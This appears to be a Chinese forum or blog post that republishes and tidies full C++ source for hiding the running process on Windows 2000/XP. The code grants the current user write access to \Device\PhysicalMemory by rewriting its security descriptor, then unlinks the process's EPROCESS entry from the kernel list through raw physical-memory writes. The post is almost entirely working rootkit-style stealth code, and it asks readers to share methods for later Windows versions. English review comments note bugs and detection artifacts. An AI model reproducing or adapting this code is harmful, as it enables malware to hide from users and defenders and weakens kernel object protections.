网上流传的《在2000和XP下隐藏进程》这篇文章,我想找原始出处却没有一篇有注明的,想必文章发表时没有附带出处,失传了吧。我整理了一下这篇文章里的代码,在VC2008下调试通过,在XP SP2下测试可用,确实隐藏掉自身进程了。程序是通过修改物理内存,似乎是摘除自身在系统中的信息,来实现隐藏的。兼容性也就比较差了,只能在2000和XP下有效,如果有朋友研究到2003及以后版本系统的方案,希望可以公开交流交流。
#include "stdafx.h"
#include <windows.h>
#include <tchar.h>
#include <Aclapi.h>
// Diagnostic output; TCHAR-aware so it follows the project's character set.
#define dprintf _tprintf

// A process has requested access to an object, but has not been granted those access rights.
// (Same value as STATUS_ACCESS_DENIED in ntstatus.h, redeclared here because that header is not included.)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

// True for NTSTATUS codes in the success/informational ranges (sign bit clear).
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Native-API counted UTF-16 string (normally declared in winternl.h/ntdef.h;
// redeclared here so the file only needs the Win32 SDK headers).
// Length and MaximumLength are in bytes, not characters.
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
// Native-API object name/attributes block passed to NtOpenSection (normally
// from winternl.h/ntdef.h).  Length must be set to sizeof(OBJECT_ATTRIBUTES);
// ObjectName is the full NT object path (here "\Device\PhysicalMemory").
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
// Signature of ntdll!NtOpenSection, resolved at run time by InitNTDLL().
//   SectionHandle    - receives the opened section handle on success
//   DesiredAccess    - SECTION_* / standard rights requested
//   ObjectAttributes - names the section object to open
// Returns an NTSTATUS; test with NT_SUCCESS().
typedef NTSTATUS (NTAPI *NTOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );
// Signature of ntdll!RtlInitUnicodeString, resolved at run time by InitNTDLL().
// Points DestinationString at SourceString and fills in the byte lengths;
// the buffer is NOT copied, so SourceString must outlive DestinationString.
typedef VOID (NTAPI *RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );
// ntdll.dll loading and resolution of the two undocumented exports used below.
bool InitNTDLL();
void CloseNTDLL();
// Rewrites a section object's DACL to grant the current user SECTION_MAP_WRITE.
bool SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
// Opens the \Device\PhysicalMemory section and maps the page directory (globals below).
HANDLE OpenPhysicalMemory();
void ClosePhysicalMemory();
// Virtual -> physical translation and 32-bit physical read/write through the section.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
ULONG GetData(PVOID addr);
bool SetData(PVOID addr, ULONG data);
// The list-unlink itself; see the definition for the technique's limits.
bool HideCurrentProcess();
// Enables (bEnable) or removes (!bEnable) a named privilege on the process token.
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable = TRUE);
// ntdll.dll module handle, owned by InitNTDLL()/CloseNTDLL().
HMODULE g_hNtDLL = NULL;

// Resolved ntdll exports; NULL until InitNTDLL() succeeds.  Not reset by
// CloseNTDLL(), so they dangle after it (harmless only because ntdll is
// never actually unmapped from a process).
NTOPENSECTION NtOpenSection = NULL;
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;

// OS version, filled by OpenPhysicalMemory() and reused by HideCurrentProcess()
// to select per-build constants.
OSVERSIONINFO g_osvi = {0};

// Section handle for \Device\PhysicalMemory and the 4 KiB view mapped from it
// (the page directory that LinearToPhys() walks).  Both owned by
// OpenPhysicalMemory()/ClosePhysicalMemory().
HANDLE g_hMPM = NULL;
PVOID g_pMapPhysicalMemory = NULL;
// Console entry point: attempts the unlink once and reports the outcome.
// _getwch() keeps the console open; it is presumably provided via stdafx.h
// (conio.h is not included here directly).
void _tmain(int argc, _TCHAR *argv[])
{
    // Simplified Chinese locale so the wide-character messages render.
    _tsetlocale(0, _T("chs"));

    const bool hidden = HideCurrentProcess();
    const _TCHAR *outcome = hidden ? _T("成功") : _T("失败");
    _tprintf(_T("隐藏当前进程%s\n"), outcome);

    _tprintf(_T("\n请按任意键退出. . ."));
    _getwch();
}
// Loads ntdll.dll and resolves NtOpenSection / RtlInitUnicodeString into the
// globals above.  Returns true only if both exports were found.  The module
// handle stays loaded on partial failure and is released by CloseNTDLL().
bool InitNTDLL()
{
    g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
    if (g_hNtDLL == NULL) {
        return false;
    }

    FARPROC pfnOpenSection = GetProcAddress(g_hNtDLL, "NtOpenSection");
    FARPROC pfnInitString = GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");

    NtOpenSection = (NTOPENSECTION)pfnOpenSection;
    RtlInitUnicodeString = (RTLINITUNICODESTRING)pfnInitString;

    return pfnOpenSection != NULL && pfnInitString != NULL;
}
// Releases the ntdll.dll handle taken by InitNTDLL().  Safe to call more than
// once.  The resolved function-pointer globals are intentionally left as-is.
void CloseNTDLL()
{
    if (g_hNtDLL == NULL) {
        return;
    }

    FreeLibrary(g_hNtDLL);
    g_hNtDLL = NULL;
}
// Rewrites the DACL of hSection so that the current user is granted
// SECTION_MAP_WRITE.  Called by OpenPhysicalMemory() when the initial
// read/write open of \Device\PhysicalMemory is denied; the caller must have
// opened hSection with READ_CONTROL | WRITE_DAC for the calls below to work.
//
// NOTE(review): this weakens the security descriptor of a kernel object for
// the rest of the boot session.  Object-access auditing on the section, or
// comparing its DACL against the default, would surface the change.
//
// Returns true when the new DACL was applied.
bool SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    DWORD dwResult = ERROR_SUCCESS;
    EXPLICIT_ACCESS ea;

    // Fetch the current DACL.  pSD receives the allocated security descriptor;
    // pDacl points into that buffer.
    dwResult = GetSecurityInfo(
        hSection,
        SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL,
        NULL,
        &pDacl,
        NULL,
        &pSD);
    if (dwResult != ERROR_SUCCESS)
    {
        dprintf(_T("GetSecurityInfo Error=%lu\n"), dwResult);
        goto __End;
    }

    // One explicit allow-ACE for SECTION_MAP_WRITE.  "CURRENT_USER" is the
    // special trustee name that SetEntriesInAcl resolves to the caller's SID.
    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = _T("CURRENT_USER");

    // Merge the ACE into the existing DACL; pNewDacl is a fresh LocalAlloc buffer.
    dwResult = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (dwResult != ERROR_SUCCESS)
    {
        dprintf(_T("SetEntriesInAcl Error=%lu\n"), dwResult);
        goto __End;
    }

    // Apply the merged DACL to the section object.
    dwResult = SetSecurityInfo(
        hSection,
        SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL,
        NULL,
        pNewDacl,
        NULL);
    if (dwResult != ERROR_SUCCESS)
    {
        dprintf(_T("SetSecurityInfo Error=%lu\n"), dwResult);
        goto __End;
    }

__End:
    // NOTE(review): per GetSecurityInfo's contract pDacl is an interior
    // pointer into pSD, not a separate allocation, so LocalFree(pDacl) frees
    // memory that pSD's LocalFree below frees again (undefined behavior).
    // Only pSD and pNewDacl are separately allocated here.
    if (pDacl != NULL)
        LocalFree(pDacl);
    if (pNewDacl != NULL)
        LocalFree(pNewDacl);
    if (pSD != NULL)
        LocalFree(pSD);

    return (dwResult == ERROR_SUCCESS);
}
// Opens the \Device\PhysicalMemory section read/write and maps the 4 KiB
// physical page at PhyDirectory into g_pMapPhysicalMemory; LinearToPhys()
// later treats that view as the kernel page directory.  Fills g_osvi as a
// side effect.  Returns the section handle (also kept in g_hMPM) or NULL.
//
// If the first open is denied, the section is reopened with WRITE_DAC, the
// DACL is rewritten by SetPhyscialMemorySectionCanBeWrited(), and the open
// is retried.
//
// NOTE(review): user-mode opens of \Device\PhysicalMemory were blocked
// starting with Windows Server 2003 SP1, so this path fails on later systems
// regardless of the version table below.
HANDLE OpenPhysicalMemory()
{
    HANDLE hResult = NULL;
    NTSTATUS status = -1;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory = 0;   // physical address of the page directory for this build

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&g_osvi);

    // Per-build constant.  NOTE(review): 5.2 (2003) is given XP's value but
    // the accompanying post reports the tool as working only on 2000 and XP.
    if (g_osvi.dwMajorVersion == 5)
    {
        switch (g_osvi.dwMinorVersion)
        {
        case 0: // 2000
            PhyDirectory = 0x30000;
            break;
        case 1: // XP
        case 2: // 2003
            PhyDirectory = 0x39000;
            break;
        }
    }
    else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
    {
        PhyDirectory = 0x30000;
    }

    if (PhyDirectory == 0)
    {
        dprintf(_T("不支持当前操作系统, 版本: %lu.%lu.%lu\n"),
            g_osvi.dwMajorVersion,
            g_osvi.dwMinorVersion,
            g_osvi.dwBuildNumber);
        goto __End;
    }

    // physmemString only references the literal; no copy is made.
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    if(status == STATUS_ACCESS_DENIED)
    {
        dprintf(_T("NtOpenSection access denied\n"));

        // READ_CONTROL to read the DACL, WRITE_DAC to replace it.
        status = NtOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
        if (NT_SUCCESS(status))
        {
            // Return value ignored; the retry below reports the real outcome.
            SetPhyscialMemorySectionCanBeWrited(g_hMPM);
            CloseHandle(g_hMPM);
            // NOTE(review): if this retry fails, g_hMPM still holds the
            // handle value closed just above; ClosePhysicalMemory() would
            // then CloseHandle it a second time — confirm NtOpenSection's
            // behaviour for the output handle on failure.
            status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
        }
    }

    if (!NT_SUCCESS(status))
    {
        dprintf(_T("NtOpenSection Error=0x%X\n"), (DWORD)status);
        goto __End;
    }

    // Map exactly one page at physical offset PhyDirectory (low DWORD only:
    // this code is 32-bit and the offsets are below 4 GiB).
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
    if (g_pMapPhysicalMemory == NULL)
    {
        // g_hMPM stays open here; the caller is expected to run ClosePhysicalMemory().
        dprintf(_T("MapViewOfFile Error=%lu\n"), GetLastError());
        goto __End;
    }

    hResult = g_hMPM;

__End:
    return hResult;
}
// Releases what OpenPhysicalMemory() acquired: the page-directory view first,
// then the section handle.  Both globals are reset, so repeated calls are no-ops.
void ClosePhysicalMemory()
{
    PVOID view = g_pMapPhysicalMemory;
    if (view != NULL) {
        UnmapViewOfFile(view);
        g_pMapPhysicalMemory = NULL;
    }

    HANDLE section = g_hMPM;
    if (section != NULL) {
        CloseHandle(section);
        g_hMPM = NULL;
    }
}
// Translates a virtual address to a physical one by walking the 32-bit,
// non-PAE two-level x86 page tables: bits 31:22 index the page directory,
// bits 21:12 the page table, bits 11:0 are the page offset; a PDE with the
// PS bit (0x80) set maps a 4 MiB page directly.
//
// BaseAddress: the mapped page directory (g_pMapPhysicalMemory).
// Returns NULL when the PDE/PTE is not present or the page table page cannot
// be mapped — indistinguishable from a genuine physical address 0.
//
// NOTE(review): PAE kernels use 64-bit entries and a third level, so this
// walk reads the wrong structures there.  The ULONG<->pointer casts also pin
// the code to 32-bit builds.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;
    ULONG PGDE = BaseAddress[VAddr >> 22];   // page-directory entry
    ULONG PTE = 0;
    ULONG PAddr = 0;
    ULONG tmp = PGDE & 0x00000080;           // PS bit: 4 MiB page

    // Present bit clear: nothing mapped at this address.
    if ((PGDE & 1) == 0)
        return NULL;

    if (tmp != 0)
    {
        // Large page: frame from the PDE, low 22 bits from the address.
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        // Map the page table the PDE points at (PGDE is reused as the view
        // pointer from here on) and pick the PTE for this address.
        PGDE = (ULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xFFFFF000, 0x1000);
        if (!PGDE)
            return NULL;
        PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];

        if ((PTE & 1) == 0)
        {
            UnmapViewOfFile((PVOID)PGDE);
            return NULL;
        }

        // 4 KiB page: frame from the PTE, low 12 bits from the address.
        PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }

    return (PVOID)PAddr;
}
// Reads the 32-bit value at virtual address addr through the physical-memory
// section: translate with LinearToPhys(), map the containing 4 KiB page, index
// into it.  Returns 0 on any failure (after printing why), so callers cannot
// tell an error from a genuine zero.
//
// NOTE(review): (phys & 0xFFF) >> 2 assumes addr is 4-byte aligned; an
// unaligned address silently reads the enclosing aligned DWORD.
ULONG GetData(PVOID addr)
{
    ULONG ret = 0;
    ULONG phys = 0;
    PULONG tmp = 0;

    phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (!phys)
    {
        _tprintf(_T("GetData LinearToPhys return 0\n"));
        return ret;
    }

    // Map the page containing phys.  FILE_MAP_WRITE is requested although
    // only a read is performed here.
    tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
    if (tmp != NULL)
    {
        ret = tmp[(phys & 0xFFF) >> 2];
        UnmapViewOfFile(tmp);
    }
    else
    {
        _tprintf(_T("GetData MapViewOfFile return NULL\n"));
    }

    return ret;
}
// Writes the 32-bit value data at virtual address addr through the
// physical-memory section (translate, map the page, store, unmap).
// Returns false (after printing why) if translation or mapping fails.
//
// NOTE(review): as in GetData(), addr is assumed 4-byte aligned.  A write
// through this path bypasses every kernel consistency check, so a wrong
// address or offset corrupts kernel memory outright.
bool SetData(PVOID addr, ULONG data)
{
    ULONG phys = 0;
    PULONG tmp = 0;

    phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (!phys)
    {
        _tprintf(_T("SetData LinearToPhys return 0\n"));
        return false;
    }

    // Write-only view of the page containing phys.
    tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
    if (tmp == NULL)
    {
        _tprintf(_T("SetData MapViewOfFile return NULL\n"));
        return false;
    }

    tmp[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(tmp);

    return true;
}
// Hides the calling process from list-walking process enumeration on Windows
// 2000/XP by unlinking its EPROCESS list entry through raw physical-memory
// writes.  Runs the unlink at most once per process (static bHidden) and
// returns true if both writes succeeded.
//
// NOTE(review): this is the classic user-mode DKOM technique.  It needs a
// writable \Device\PhysicalMemory section and hard-coded per-build kernel
// offsets, neither of which hold on later Windows.  The EPROCESS object itself
// is left in place, so an object/pool scan, the handle table or the scheduler
// still see the process; only enumeration that walks the list misses it.
bool HideCurrentProcess()
{
    ULONG fw = 0;        // Flink of the process's list entry
    ULONG bw = 0;        // Blink of the process's list entry
    ULONG thread = 0;    // current ETHREAD address
    ULONG process = 0;   // owning EPROCESS address
    static bool bHidden = false;

    if (bHidden)
        return bHidden;

    // Return value ignored.  NOTE(review): the DACL calls this program makes
    // need READ_CONTROL/WRITE_DAC on the section, not SeSecurityPrivilege —
    // presumably a leftover; confirm whether it is needed at all.
    EnablePrivilege(SE_SECURITY_NAME);

    if (!InitNTDLL() || OpenPhysicalMemory() == NULL)
        goto __End;

    // 0xFFDFF124 is a fixed 32-bit x86 kernel address (in the processor
    // control region) holding the current thread pointer.  NOTE(review): this
    // is the processor-0 region; whether it names *this* thread on a
    // multi-processor system is not established here.
    thread = GetData((PVOID)0xFFDFF124); // Read the ETHREAD struct
    if (!thread)
    {
        _tprintf(_T("thread=0\n"));
        goto __End;
    }

    // ETHREAD+0x44 holds the owning process pointer on the targeted builds.
    process = GetData((PVOID)(thread + 0x44)); // Read the EPROCESS struct
    if (!process)
    {
        _tprintf(_T("process=0\n"));
        goto __End;
    }

    // Read Flink/Blink of the LIST_ENTRY inside EPROCESS at this build's
    // offset.  NOTE(review): the 2003 offsets 0x8A/0x8E are not pointer-
    // aligned, which looks like a transcription error; the accompanying post
    // reports the tool as verified only on 2000 and XP.
    if (g_osvi.dwMajorVersion == 5)
    {
        switch (g_osvi.dwMinorVersion)
        {
        case 0: // 2000
            fw = GetData((PVOID)(process + 0xA0));
            bw = GetData((PVOID)(process + 0xA4));
            break;
        case 1: // XP
            fw = GetData((PVOID)(process + 0x88));
            bw = GetData((PVOID)(process + 0x8C));
            break;
        case 2: // 2003
            fw = GetData((PVOID)(process + 0x8A));
            bw = GetData((PVOID)(process + 0x8E));
            break;
        }
    }
    else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
    {
        fw = GetData((PVOID)(process + 0x98));
        bw = GetData((PVOID)(process + 0x9C));
    }

    // Doubly-linked-list unlink: next->Blink = bw, prev->Flink = fw.  The
    // process's own entry is not rewritten, so its stale Flink/Blink still
    // point into the list — an artifact memory forensics can check for.
    if (fw && bw)
        bHidden = (SetData((PVOID)(fw + 4), bw) && SetData((PVOID)bw, fw));
    else
        _tprintf(_T("fw=%lu, bw=%lu\n"), fw, bw);

__End:
    CloseNTDLL();
    ClosePhysicalMemory();

    // With bEnable == FALSE, EnablePrivilege() uses SE_PRIVILEGE_REMOVED, which
    // deletes the privilege from the token for the rest of the process lifetime.
    EnablePrivilege(SE_SECURITY_NAME, FALSE);

    return bHidden;
}
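// Enables (bEnable) or removes (!bEnable) the named privilege on the current
// process token.
//
// Returns TRUE only if the token was actually adjusted.  The original returned
// AdjustTokenPrivileges' result directly, which is TRUE even when the token
// does not hold the privilege at all (the API then reports
// ERROR_NOT_ALL_ASSIGNED via GetLastError); that case now yields FALSE.
//
// Note: bEnable == FALSE uses SE_PRIVILEGE_REMOVED, which deletes the privilege
// from the token rather than merely disabling it (0), so a later
// EnablePrivilege(name, TRUE) in the same process will fail.  Kept as the
// original author wrote it.
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable)
{
    BOOL bReturn = FALSE;
    HANDLE hToken = NULL;
    LUID uidName = {0};
    TOKEN_PRIVILEGES tpToken = {0};
    DWORD dwReturn = 0;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return bReturn;

    if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))
    {
        CloseHandle(hToken);
        return bReturn;
    }

    tpToken.PrivilegeCount = 1;
    tpToken.Privileges[0].Luid = uidName;
    tpToken.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : SE_PRIVILEGE_REMOVED;

    // A non-zero return means the call was processed, not that every
    // privilege was adjusted; only ERROR_SUCCESS afterwards means it was.
    if (AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn))
        bReturn = (GetLastError() == ERROR_SUCCESS);

    CloseHandle(hToken);

    return bReturn;
}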